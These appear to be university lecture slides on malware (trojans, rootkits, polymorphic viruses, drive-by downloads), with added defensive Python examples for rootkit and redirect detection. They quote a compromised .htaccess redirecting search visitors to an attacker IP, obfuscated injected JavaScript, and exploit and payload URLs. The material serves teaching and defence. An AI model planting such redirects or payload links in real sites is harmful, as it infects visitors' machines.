CS 378
Malware: Rootkits and Viruses
Vitaly Shmatikov
slide 1
Malware
Malicious code often masquerades as good
software or attaches itself to good software
Some malicious programs need host programs
• Trojan horses, logic bombs, viruses
Others can exist and propagate independently
• Worms, automated viruses
Many infection vectors and propagation methods
Modern malware often combines trojan, rootkit,
and worm functionality
slide 2
Remote Vulnerabilities (2001-06)
[Geer]
(Chart, not reproduced: new vulnerabilities versus exploitable targets, 2001-06)
Trojan Horses
A Trojan horse is malicious code hidden in an
apparently useful host program
When the host program is executed, the trojan does
something harmful or unwanted
• User must be tricked into executing the host program
• In 1995, a program distributed as PKZ300B.EXE looked
like a new version of PKZIP… when executed, it
formatted your hard drive
Old-style trojans did not replicate, but today many
are spread by virus- and worm-like mechanisms
slide 4
Computer Backdoors circa 1958
AN/FSQ-7 air defense intercept computer
• Largest computer ever built
• 50,000 vacuum tubes,
275 tons, 3 MWatt of power,
½ acre of floor space
“Hula Girl” diagnostic program
• If you pointed the light gun at
her navel and pulled the trigger,
her skirt would fall off
slide 5
“Reflections on Trusting Trust”
Ken Thompson's 1983 Turing Award lecture
– Linked from the course website (reference section)
1. Added a backdoor-opening Trojan to login program
2. Anyone looking at source code would see this, so
changed the compiler to add backdoor at compile-time
3. Anyone looking at compiler source code would see
this, so changed the compiler to recognize when it's
compiling a new compiler and to insert Trojan into it
“The moral is obvious. You can't trust code you
did not totally create yourself. (Especially code
from companies that employ people like me).”
slide 6
Prevalence of Trojans (2004-06)
[Geer]
(Chart, not reproduced: percentage of enterprise PCs carrying trojans)
If you have one, you probably have more
Example of a Trojan
[From “The Art of Intrusion”]
Discover a helpdesk application on a Web server
• Via misconfigured FrontPage, which allows arbitrary
uploads and downloads from webroot directory
Modify its input validation routine
• Change the list of invalid characters to contain only
spaces and ~
Use SQL injection to log in with admin privileges
Hijack a dormant VPN account and log into the
internal network via VPN
slide 8
More Trojans
[From “The Art of Intrusion”]
Buffer overflow in BIND to get root on Lockheed
Martin's DNS server, install password sniffer
• Sniffer logs stored in directory called /var/adm/ …
Excite@Home employees connect via dialup;
attacker installs remote access trojans on their
machines via open network shares, sniffs IP
addresses of promising targets
• To bypass anti-virus scanners, use commercial remote-
access software modified to make it invisible to user
slide 9
... And More
1987: Login program on NASA computers hacked
by Chaos Computer Club, steals passwords
1999: Hacked login program at U. of Michigan
steals 1534 passwords within 23 hours
2003: AOL employees tricked into accepting
trojans via AIM, hackers get complete remote
control over their machines via IRC
• Also social engineering to steal passwords
2003: Badtrans worm installs a keystroke-logging
trojan, sends log to one of 22 email accounts
slide 10
Remote Administration Tools
Legitimate tools are often abused
• Citrix MetaFrame, WinVNC, PC Anywhere
– Complete remote control over the machine
– Easily found by port scan (e.g., port 1494 – Citrix)
• Bad installations, crackable password authentication
– “The Art of Intrusion” – hijacking remote admin tools to break
into a cash transfer company, a bank's IBM AS/400 server
Semi-legitimate tools
• Back Orifice, NetBus
• Rootkit-like behavior: hide themselves, log keystrokes
• Considered malicious by anti-virus software
slide 11
Communicating Via Backdoors
SSH daemon on a high port
• Communication is encrypted, so it is hard for a
network-based intrusion detector to recognize
• Hide SSH activity from the host by patching netstat
– May be possible to detect backdoors by observing their
activity from a network-based intrusion detection system
UDP listener
Passively sniff the network for master's commands
All sorts of standard and non-standard tunnels
slide 12
Night Dragon Attacks
Started in November 2009
Targets: oil, energy, petrochemical companies
Install customized RAT tools, steal internal
documents, deliver them to China
Propagation vectors
• SQL injection on external Web servers to harvest
account credentials
• Targeted emails to company executives (spear phishing)
• Password cracking and “pass the hash” attacks
slide 13
zwShell RAT
When launched, presents a fake crash error
Type “zw.china” into the hidden password field
Can create a custom trojan or start a C&C server
• Select listening port, password for encrypting C&C
traffic, custom sound notifications when infected
machines connect or disconnect
slide 14
RAT Capabilities
“Dropper” program installs RAT DLL, launches it
as persistent Windows service, deletes itself
RAT notifies specified C&C server, waits for
instructions
Attacker at C&C server has full control of the
infected machine, can view files, desktop,
manipulate registry, launch command shell
slide 15
Origin of Night Dragon Attacks
C&C servers hosted in Heze City,
Shandong Province, China
All data exfiltration to IP addresses in Beijing, on
weekdays, between 9a and 5p Beijing time
Uses generic tools from Chinese hacking sites
• Hookmsgina and WinlogonHack: password stealing
• ASPXSpy: Web-based RAT
(screenshot text: “Make in China”, E-mail: master@rootkit.net.cn)
slide 16
Rootkits
Rootkit is a set of trojan system binaries
• Main characteristic: stealthiness
• Hides infection from the host's owner
• Often includes a sniffer (to record users' passwords)
• Originally on Unix
Typical infection path
• Use stolen password or dictionary attack to log in
• Use a buffer overflow in a vulnerable local program to
gain root privileges
– rdist, sendmail, loadmodule, rpc.ypupdated, lpr, passwd
• Download rootkit, unpack, compile, install
slide 17
Hiding Rootkit's Presence on Unix
Create a hidden directory
• /dev/.lib, /usr/src/.poop and similar
• Often use invisible characters in directory name (why?)
Install hacked binaries for system programs such
as netstat, ps, ls, du, login
Can't detect attacker's processes, files or network
connections by running standard UNIX commands!
Modified binaries have the same checksum as the originals
• What should be used instead of checksum?
slide 18
Function Hooking
Idea: replace pointer to a legitimate function with
an address of malicious code
Pointer hooking
• Modify the pointer in OS's Global Offset Table, where
function addresses are stored
“Detour” or “inline” hooking
• Insert a jump in first few bytes of a legitimate function
• This requires subverting memory protection!
Detectable by a clever rootkit detector
• Hard to hide user-land rootkit from kernel-level detector
slide 19
Kernel Rootkits
Get loaded into kernel as an external module
• For example, via compromised device driver or a badly
implemented “digital rights” module (e.g., Sony XCP)
Replace addresses in system call table, interrupt
descriptor table, etc.
If kernel modules disabled, directly patch kernel
memory through /dev/kmem (SucKIT rootkit)
Inject malicious code into a running process via
PTRACE_ATTACH and PTRACE_DETACH
• Security software is often the first injection target!
slide 20
Mebroot (Windows)
Replaces the host's Master Boot Record (MBR)
• First physical sector of the hard drive
• Launches before Windows loads
No registry changes, very little hooking
Stores data in physical sectors, not files
• Invisible through normal OS interface
Uses its own version of network driver API to
send and receive packets
• Invisible to “personal firewall” in Windows
Used in the Torpig botnet
slide 21
Detecting Rootkit's Presence
Sad way to find out
• Run out of physical disk space because of sniffer logs
• Logs are invisible because du and ls have been hacked!
Manual confirmation
• Reinstall clean ps and see what processes are running
Automatic detection
• Rootkit does not alter the underlying data structures that
netstat, ps, ls, du, ifconfig read, so a detector can compare
their output against that data
• Host-based intrusion detection can find rootkit files
– …assuming an updated version of rootkit did not disable the
intrusion detection system!
slide 22
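An added example (not part of the lecture) of the automatic-detection idea on slide 22: a cross-view check that compares the process list the normal interface shows (/proc, which ps reads) with what the kernel admits when asked about each PID directly. It assumes Linux; the thread-group lookup avoids reporting threads, which answer to kill() but are never listed, as hidden processes.

```python
import os

def listed_pids() -> set:
    """PIDs as the normal interface reports them (what ps reads from /proc)."""
    return {int(d) for d in os.listdir("/proc") if d.isdigit()}

def probed_pids(limit: int) -> set:
    """PIDs the kernel admits exist when asked about each one directly:
    kill() with signal 0 tests existence without delivering anything."""
    alive = set()
    for pid in range(1, limit + 1):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue
        except PermissionError:
            pass                      # exists, just owned by another user
        alive.add(pid)
    return alive

def thread_group_leader(pid: int) -> int:
    """Tgid from /proc/<pid>/status. Threads answer to kill() but are not
    listed in /proc, so they must not be reported as hidden processes."""
    try:
        with open(f"/proc/{pid}/status") as f:
            for line in f:
                if line.startswith("Tgid:"):
                    return int(line.split()[1])
    except OSError:
        pass
    return pid

def hidden_pids(listed: set, probed: set, leader=thread_group_leader) -> set:
    """Cross-view difference: PIDs the kernel knows about that the listing
    omits, discounting threads whose group leader is listed."""
    return {p for p in probed - listed if leader(p) not in listed}

def scan(limit: int = 65536) -> set:
    """Take the listing before and after probing so that a process which
    exits or starts during the probe is not mistaken for a hidden one."""
    before = listed_pids()
    probed = probed_pids(limit)
    return hidden_pids(before | listed_pids(), probed)
```

A rootkit that hooks the kernel's own process accounting defeats this check too; it catches the user-land hacked-binary case the slide describes.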
Viruses
Virus propagates by infecting other programs
• Automatically creates copies of itself, but to propagate,
a human has to run an infected program
• Self-propagating malware usually called worms
Many propagation methods
• Insert a copy into every executable (.COM, .EXE)
• Insert a copy into boot sectors of disks
– PC era: “Stoned” virus infected PCs booted from infected
floppies, stayed in memory, infected every inserted floppy
• Infect TSR (terminate-and-stay-resident) routines
– By infecting a common OS routine, a virus can always stay in
memory and infect all disks, executables, etc.
slide 23
First Virus: Creeper
http://history-computer.com/Internet/Maturing/Thomas.html
Written in 1971 at BBN
Infected DEC PDP-10
machines running TENEX OS
Jumped from machine to machine over ARPANET
• Copied its state over, tried to delete old copy
Payload: displayed a message
“I'm the creeper, catch me if you can!”
Later, Reaper was written to hunt down Creeper
slide 24
Virus Techniques
Macro viruses
• A macro is an executable program embedded in a word
processing document (MS Word) or spreadsheet (Excel)
• When infected document is opened, virus copies itself
into global macro file and makes itself auto-executing
(gets invoked whenever any document is opened)
Stealth techniques
• Rootkit: infect OS so that infected files appear normal
• Code mutation and obfuscation
slide 25
Polymorphic Viruses
Encrypted viruses: constant decryptor followed
by the encrypted virus body
Polymorphic viruses: constantly create new
random encryptions of the same virus body
• Marburg (Win95), HPS (Win95), Coke (Win32)
• Virus includes an engine for creating new keys and
new encryptions of the virus body
Decryptor code is constant and can be detected
• Historical note: Crypto virus decrypted its body by
brute-force key search to avoid explicit decryptor code
slide 26
Virus Detection
Simple anti-virus scanners
• Look for signatures (fragments of known virus code)
• Heuristics for recognizing code associated with viruses
– Example: polymorphic viruses often use decryption loops
• Integrity checking to find modified files
– Record file sizes, checksums, MACs (keyed hashes of contents)
Generic decryption and emulation
• Emulate CPU execution for a few hundred instructions,
recognize known body after virus decrypts
– Does not work very well against metamorphic viruses and
viruses not located near beginning of infected executable
• What if decryptor starts with millions of NOPs?
slide 27
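Slide 18 asks what should replace a checksum, and slide 27 lists keyed hashes (MACs) among the integrity-checking options. The following added example (not from the lecture) shows the difference on constructed byte strings standing in for a clean and a trojaned ps: an additive checksum can be kept unchanged by padding the modified file, while an HMAC-SHA256 baseline computed with a key the rootkit does not have flags it.

```python
import hashlib
import hmac

# Constructed sample "binaries" (byte strings, not real programs): a clean ps
# and a trojaned ps that hides any process whose name contains "sniff".
CLEAN_PS = b"ps: list processes\x00hide=\x00"
TROJANED_PS = b"ps: list processes\x00hide=sniff\x00"

def additive_checksum(data: bytes) -> int:
    """16-bit additive checksum: the weak kind of check a rootkit can preserve."""
    return sum(data) & 0xFFFF

def pad_to_checksum(modified: bytes, target: int) -> bytes:
    """Append bytes so that additive_checksum(result) == target.
    This is why matching checksums prove nothing against a deliberate change."""
    delta = (target - additive_checksum(modified)) & 0xFFFF
    return modified + bytes([255] * (delta // 255) + [delta % 255])

def hmac_tag(key: bytes, data: bytes) -> str:
    """Keyed hash (MAC) of the file; not forgeable without the key."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()

def checksum_baseline(files: dict) -> dict:
    return {name: additive_checksum(data) for name, data in files.items()}

def hmac_baseline(files: dict, key: bytes) -> dict:
    return {name: hmac_tag(key, data) for name, data in files.items()}

def changed_by_checksum(files: dict, base: dict) -> list:
    return [n for n, d in files.items() if additive_checksum(d) != base[n]]

def changed_by_hmac(files: dict, base: dict, key: bytes) -> list:
    return [n for n, d in files.items()
            if not hmac.compare_digest(hmac_tag(key, d), base[n])]

def demo() -> tuple:
    """Baseline the clean ps, install a trojaned ps padded to the same checksum,
    and report what each method flags: ([], ['/bin/ps'])."""
    key = b"constructed-baseline-key"   # must live off the host, e.g. on read-only media
    clean = {"/bin/ps": CLEAN_PS}
    cs_base, mac_base = checksum_baseline(clean), hmac_baseline(clean, key)
    infected = {"/bin/ps": pad_to_checksum(TROJANED_PS, cs_base["/bin/ps"])}
    return changed_by_checksum(infected, cs_base), changed_by_hmac(infected, mac_base, key)
```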
Virus Detection by Emulation
(Diagram, not reproduced: the virus randomly generates a new key and a
corresponding decryptor; mutations A, B and C each wrap the same virus body,
which the decryptor decrypts and executes)
To detect an unknown mutation of a known virus, emulate CPU execution
until the current sequence of instruction opcodes matches the known
sequence for the virus body
slide 28
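An added example (not from the lecture) of the generic-decryption idea on slides 27 and 28, on a constructed toy instruction set rather than x86: make_mutation produces polymorphic copies of one fixed "virus body" that differ only in XOR key (and an optional NOP sled), and emulate_and_scan runs a copy, checking memory for the known body after every instruction. The budget argument shows slide 27's objection: a long enough sled exhausts the instruction budget before decryption happens.

```python
# Toy instruction set for the emulator (constructed for this example, not x86).
# Operands are single bytes, so images must be shorter than 256 bytes.
NOP, LOAD_KEY, LOAD_PTR, LOAD_CNT = 0x00, 0x10, 0x20, 0x30
XOR_MEM, INC_PTR, DEC_CNT, JNZ, EXEC = 0x40, 0x41, 0x42, 0x50, 0x60

# The known virus body: a constant opcode sequence the scanner holds as signature.
VIRUS_BODY = bytes([0x71, 0x72, 0x73, 0x74, 0x75, 0x76])
SIGNATURE = VIRUS_BODY

def make_mutation(body: bytes, key: int, nops: int = 0) -> bytes:
    """One polymorphic copy: optional NOP sled, a constant-shaped decryptor,
    then the body XOR-encrypted under `key`. Only key and sled length vary."""
    assert 1 <= key <= 255 and nops + 12 + len(body) < 256
    loop = nops + 6                  # address of XOR_MEM, the loop head
    body_at = nops + 12              # the decryptor is 12 bytes long
    decryptor = bytes([LOAD_KEY, key, LOAD_PTR, body_at, LOAD_CNT, len(body),
                       XOR_MEM, INC_PTR, DEC_CNT, JNZ, loop, EXEC])
    return bytes([NOP] * nops) + decryptor + bytes(b ^ key for b in body)

def emulate_and_scan(image: bytes, budget: int) -> tuple:
    """Generic decryption: run at most `budget` instructions of the image and
    look for SIGNATURE in memory after each one. Returns (detected, steps)."""
    mem = bytearray(image)
    pc = key = ptr = cnt = steps = 0
    while steps < budget and pc < len(mem):
        op = mem[pc]
        if op == NOP:
            pc += 1
        elif op == LOAD_KEY:
            key, pc = mem[pc + 1], pc + 2
        elif op == LOAD_PTR:
            ptr, pc = mem[pc + 1], pc + 2
        elif op == LOAD_CNT:
            cnt, pc = mem[pc + 1], pc + 2
        elif op == XOR_MEM:
            mem[ptr] ^= key
            pc += 1
        elif op == INC_PTR:
            ptr, pc = ptr + 1, pc + 1
        elif op == DEC_CNT:
            cnt, pc = cnt - 1, pc + 1
        elif op == JNZ:
            pc = mem[pc + 1] if cnt else pc + 2
        else:
            break                    # EXEC (or junk): never "run" the body itself
        steps += 1
        if mem.find(SIGNATURE) != -1:   # decrypted body now visible in memory
            return True, steps
    return False, steps
```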
Metamorphic Viruses
Obvious next step: mutate the virus body, too!
Apparition: early Win32 metamorphic virus
• Carries its source code (contains useless junk)
• Looks for compiler on infected machine
• Changes junk in its source and recompiles itself
• New binary copy looks different!
Mutation is common in macro and script viruses
• Macros/scripts are usually interpreted, not compiled
slide 29
Obfuscation and Anti-Debugging
Common in worms, viruses, bots
Goal: prevent code analysis and signature-based
detection, foil reverse-engineering
• Insert garbage opcodes and change control structure
• Different code in each copy of the virus
– Effect of code execution is the same, but difficult to detect
by passive analysis
• Packed binaries
Detect debuggers and virtual machines,
terminate execution
slide 30
Mutation Techniques
Same code, different register names
• Regswap (Win32)
Same code, different subroutine order
• BadBoy (DOS), Ghost (Win32)
Decrypt virus body instruction by instruction,
push instructions on stack, insert and remove
jumps, rebuild body on stack
• Zmorph (Win95)
• Can be detected by emulation because the rebuilt body
has a constant instruction sequence
slide 31
Mutation Engines
Real Permutating Engine/RPME, ADMutate, etc.
Large arsenal of obfuscation techniques
• Instructions reordered, branch conditions reversed
• Jumps and NOPs inserted in random places
• Garbage opcodes inserted in unreachable code areas
• Instruction sequences replaced with other instructions
that have the same effect, but different opcodes
– Mutate SUB EAX, EAX into XOR EAX, EAX or
PUSH EBP; MOV EBP, ESP into PUSH EBP; PUSH ESP; POP EBP
There is no constant, recognizable virus body
slide 32
Example of Zperm Mutation
From Szor and Ferrie, “Hunting for Metamorphic”
• Linked from the course website (reference section)
slide 33
Detour: Skype
[Biondi and Desclaux]
slide 37
Skype: Code Integrity Checking
[Biondi and Desclaux]
slide 38
Skype: Anti-Debugging
[Biondi and Desclaux]
slide 39
Skype: Control Flow Obfuscation (1)
[Biondi and Desclaux]
slide 40
Skype: Control Flow Obfuscation (2)
[Biondi and Desclaux]
slide 41
How Hard Is It to Write a Virus?
2268 matches for “virus creation tool” in CA's
Spyware Information Center
• Including dozens of poly- and metamorphic engines
OverWritting Virus Construction Toolkit
• “The perfect choice for beginners”
Biological Warfare Virus Creation Kit
Vbs Worm Generator (for Visual Basic worms)
• Used to create the Anna Kournikova worm
Many others
slide 42
Viruses in P2P Networks
[Shin, Jung, Balakrishnan]
Millions of users willingly download files
• KaZaA: 2.5 million users in May 2006
Easy to insert an infected file into the network
• Pretend to be an executable of a popular application
– “Adobe Photoshop 10 full.exe”, “WinZip 8.1.exe”, …
• 2006: ICQ and Trillian the most popular names
Malware can open backdoors, steal confidential
information, spread spam
• 70% of infected hosts already on DNS spam blacklists
(what does this imply?)
slide 43
Dangerous KaZaA Queries
[Shin, Jung, Balakrishnan]
slide 45
Stealth Techniques
[Shin, Jung, Balakrishnan]
Mutation: virus has multiple binary variants
• Defeats naïve signature-based detection
• Used by the most widespread viruses
– Tanked: 62 variants, SdDrop: 14 variants
Aliasing: virus places its copies under different
names into the infected host's sharing folder
• “ICQ Lite .exe”, “ICQ Pro 2003b.exe”, “MSN
Messenger 5.2.exe”
slide 46
Propagation via Websites
[Moshchuk et al.]
Websites with popular content
• Games: 60% of websites contain executable content,
one-third contain at least one malicious executable
• Celebrities, adult content, everything except news
– Malware in 20% of search
results for “Jessica Biel”
(2009 McAfee study)
(Chart, not reproduced: most popular sites with malicious content, Oct 2005)
Most are variants of the same few adware applications (WhenU, etc.)
slide 47
Malicious Functionality
[Moshchuk et al.]
Adware
• Display unwanted pop-up ads
Browser hijackers
• Modify home page, search tools,
redirect URLs
Trojan downloaders
• Download and install
additional malware
Dialer (expensive toll numbers)
Keylogging
slide 48
Drive-By Downloads
Website “pushes” malicious executable to user's
browser with inline JavaScript or pop-up window
• Naïve user may click “Yes” in the dialog box
Can install malicious software automatically by
exploiting bugs in the user's browser
• 1.5% of URLs - Moshchuk et al. study
• 5.3% of URLs - “Ghost Turns Zombie”
• 1.3% of Google queries - “All Your IFRAMEs Point to Us”
Many infectious sites exist only for a short time,
behave non-deterministically, change often
slide 49
Obfuscated JavaScript
[Provos et al.]
document.write(unescape("%3CHEAD%3E%0D%0A%3CSCRIPT%20
LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21--%0D%0A
/*%20criptografado%20pelo%20Fal%20-%20Deboa%E7%E3o
%20gr%E1tis%20para%20seu%20site%20renda%20extra%0D
...
3C/SCRIPT%3E%0D%0A%3C/HEAD%3E%0D%0A%3CBODY%3E%0
D%0A
%3C/BODY%3E%0D%0A%3C/HTML%3E%0D%0A"));
//-->
slide 50
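An added example (not from the lecture or the Provos et al. paper) of the first step an analyst takes with a payload of the shape shown on slide 50: decode the unescape() argument the way JavaScript would (percent-escapes are Latin-1 code units, which is why %E7%E3 above decodes to Portuguese accented letters) and list the tags it injects. The sample script is constructed for this example, since the slide's payload is elided in the middle, and malware.example is a placeholder host.

```python
import re
from urllib.parse import unquote

# Constructed sample in the shape of the slide's payload (not the original):
# document.write(unescape("...")) hiding a zero-size iframe.
SAMPLE_JS = (
    'document.write(unescape("%3CHEAD%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22'
    'Javascript%22%3E%0D%0A/*%20criptografado%20*/%0D%0A%3C/SCRIPT%3E%0D%0A'
    '%3C/HEAD%3E%0D%0A%3CBODY%3E%0D%0A%3Ciframe%20src%3D%22http%3A//'
    'malware.example/in.html%22%20width%3D0%20height%3D0%3E%3C/iframe%3E'
    '%0D%0A%3C/BODY%3E%0D%0A"));'
)

CALL_RE = re.compile(r'document\.write\s*\(\s*unescape\s*\(\s*"((?:[^"\\]|\\.)*)"\s*\)\s*\)')
TAG_RE = re.compile(r'<(iframe|script)\b[^>]*>', re.I)
SRC_RE = re.compile(r'\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
HIDDEN_RE = re.compile(r'(width|height)\s*=\s*["\']?0\b', re.I)

def js_unescape(s: str) -> str:
    """JavaScript unescape(): %XX is a Latin-1 code unit, %uXXXX a UTF-16 unit."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding='latin-1')

def decode_document_writes(js: str) -> list:
    """Decode every document.write(unescape("...")) call and return one record
    per injected <iframe>/<script>: (tag, src, hidden), where hidden means a
    zero-size frame, the usual drive-by shape."""
    found = []
    for call in CALL_RE.finditer(js):
        html = js_unescape(call.group(1))
        for tag in TAG_RE.finditer(html):
            src = SRC_RE.search(tag.group(0))
            found.append((tag.group(1).lower(),
                          src.group(1) if src else None,
                          bool(HIDDEN_RE.search(tag.group(0)))))
    return found
```

Real payloads nest several such layers (an eval() of a decoded string that decodes again), so in practice the decoder is applied repeatedly to its own output until no further call matches.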
“Ghost in the Browser”
Large study of malicious URLs by Provos et al.
(Google security team)
In-depth analysis of 4.5 million URLs
• About 10% malicious
Several ways to introduce exploits
• Compromised Web server
• User-contributed content
• Advertising
• Third-party widgets
slide 51
Compromised Web Server
[Provos et al.]
Vulnerabilities in phpBB2 and InvisionBoard enable
complete compromise of the underlying machine
• All servers hosted on a virtual farm become malware
distribution vectors
• Example (copyright boilerplate from an infected page):
“Powered by Invision Power Board(U) v1.3.1 Final © 2003 IPS, Inc.”
Exploit iframes inserted into copyright boilerplate
Test machine infected with 50 malware binaries
slide 52
Redirection Using .htaccess
[Provos et al.]
After compromising the site, change .htaccess to
redirect visitors to a malicious site
Hide redirection from website owner
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.204/in.html?s=xx [R,L]
If the user comes via one of these search engines, redirect to a
staging server, which redirects to a constantly changing set of
malicious domains
Compromised .htaccess file
frequently rewritten with new IP addresses,
restored if site owner deletes it
slide 53
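An added example (not from the lecture or the Provos et al. paper) of a check a site owner could run against the .htaccess on slide 53: it pairs each RewriteRule with the RewriteCond lines that bind to it and flags rules that fire only for search-engine-referred visitors and send them off-site, which is exactly why the owner, typing the URL directly, never sees the redirect. The sample .htaccess is constructed in the slide's shape, with the documentation address 192.0.2.10 standing in for the real staging server.

```python
import re
from ipaddress import ip_address

# Constructed .htaccess in the shape of the slide's (placeholder IP 192.0.2.10
# from the documentation range stands in for the real staging server).
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://192.0.2.10/in.html?s=xx [R,L]
RewriteRule ^old/(.*)$ /new/$1 [R=301,L]
"""

SEARCH_ENGINES = ("google", "aol", "msn", "altavista", "ask", "yahoo", "bing")
COND_RE = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)
URL_RE = re.compile(r"^https?://([^/:?#]+)", re.I)

def is_bare_ip(host: str) -> bool:
    """Redirects to a bare IP rather than a hostname are the usual shape here."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False

def referer_cloaking_rules(htaccess: str, own_hosts=()) -> list:
    """Return (line_no, target, engines, bare_ip) for each RewriteRule that
    fires only for search-engine-referred visitors and sends them off-site."""
    findings, engines = [], set()
    own = {h.lower() for h in own_hosts}
    for no, line in enumerate(htaccess.splitlines(), 1):
        cond = COND_RE.match(line)
        if cond:
            variable, pattern = cond.group(1).lower(), cond.group(2).lower()
            if "http_referer" in variable:
                engines.update(e for e in SEARCH_ENGINES if e in pattern)
            continue
        rule = RULE_RE.match(line)
        if not rule:
            continue                     # comments, blank lines, other directives
        target = rule.group(2)
        host = URL_RE.match(target)
        if engines and host and host.group(1).lower() not in own:
            findings.append((no, target, sorted(engines), is_bare_ip(host.group(1))))
        engines = set()                  # RewriteCond lines bind only to the next RewriteRule
    return findings
```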
User-Contributed Content
[Provos et al.]
Example: site allows user to create online polls,
claims only limited HTML support
• Sample poll:
• Interpreted by browser as
location.replace('http://videozfree.com')
• Redirects user to a malware site
slide 54
Advertising
[Provos et al.]
Advertising, by definition, is ceding control of Web
content to another party
Webmasters must trust advertisers not to show
malicious content
Sub-syndication allows advertisers to rent out
their advertising space to other advertisers
But trust is not transitive!
• Webmaster may trust his advertisers, but this does not
mean he should trust those trusted by his advertisers
slide 55
Example of an Advertising Exploit
[Provos et al.]
Video sharing site includes a banner from a large US
advertising company as a single line of JavaScript…
… which generates JavaScript to be fetched from
another large US company
… which generates more JavaScript pointing to a smaller
US company that uses geo-targeting for its ads
… the ad is a single line of HTML containing an iframe to
be fetched from a Russian advertising company
… when retrieving iframe, “Location:” header redirects
browser to a certain IP address
… which serves encrypted JavaScript, attempting
multiple exploits against the browser
slide 56
Another Advertising Exploit
[Provos et al.]
Website of a Dutch radio station…
… shows a banner advertisement from a German site
… JavaScript in the ad redirects to a big US advertiser
… which redirects to another Dutch advertiser
… which redirects to yet another Dutch advertiser
… ad contains obfuscated JavaScript; when executed by
the browser, points to another script hosted in Austria
… encrypted script redirects the browser via multiple
IFRAMEs to an exploit site hosted in Austria
… site automatically installs multiple trojan downloaders
slide 57
Today (March 29, 2011)
Spotify ads hit by malware attack
slide 58
Third-Party Widgets
[Provos et al.]
Make sites “prettier” using third-party widgets
• Calendars, visitor counters, etc.
Example: free widget for keeping visitor statistics
operates fine from 2002 until 2006
In 2006, widget starts pushing exploits to all
visitors of pages linked to the counter
http://expl.info/cgi-bin/ie0606.cgi?homepage
http://expl.info/demo.php
http://expl.info/cgi-bin/ie0606.cgi?type=MS03-11&SP1
http://expl.info/ms0311.jar
http://expl.info/cgi-bin/ie0606.cgi?exploit=MS03-11
http://dist.info/f94mslrfum67dh/winus.exe
slide 59
Exploitation Mechanisms
[Provos et al.]
Bugs in browser's security logic or memory
vulnerabilities
Example: MS Data Access Components bug
• Compromised web page contains an iframe
• JavaScript in iframe instantiates an ActiveX object and
makes an XMLHTTP request to retrieve an executable
• Write executable to disk using Adodb.stream and
launch it using Shell.Application
Example: WebViewFolderIcon memory vuln
• Spray the heap with a large number of JavaScript string
objects containing x86 shellcode, hijack control
slide 60
Social Engineering
[Provos et al.]
Even if the user's browser is up-to-date and not
exploitable, can try to trick the user into
“voluntarily” installing a malicious binary
Example: website with thumbnails of adult videos
• Clicking on a thumbnail brings up a page that looks like
Windows Media Player and a prompt:
– “Windows Media Player cannot play video file. Click here to
download missing Video ActiveX object.”
• The “codec” is actually a malware binary
Fake anti-virus (“scareware”)
• January 2009: 148,000 infected URLs, 450 domains
slide 61
Malware Binaries
[Provos et al.]
Adware
Trojan downloaders
• Download other malicious binaries, rootkits, etc.
• Steal financial information, email to attacker's account
Majority of exploits hosted on third-party servers,
not directly on compromised sites
• Popular exploits are linked from over 10,000 URLs
• Same binary is usually hosted at multiple sites
• Most URLs rarely change their binaries, but some
switch as often as every hour
slide 62
Drive-By Botnet Infection
[Polychronakis et al. “Ghost Turns Zombie”]
Join infected computer to a botnet
Exfiltrate information (especially passwords)
• Keystroke loggers or browser hooks
Participate in large-scale spam campaigns
• Download ZIP files with target email addresses,
instructions on forming spam messages
Help malware authors debug their malware
• If attempt to install a malicious kernel driver fails,
installer uploads a small memory dump file
containing a stack trace
slide 63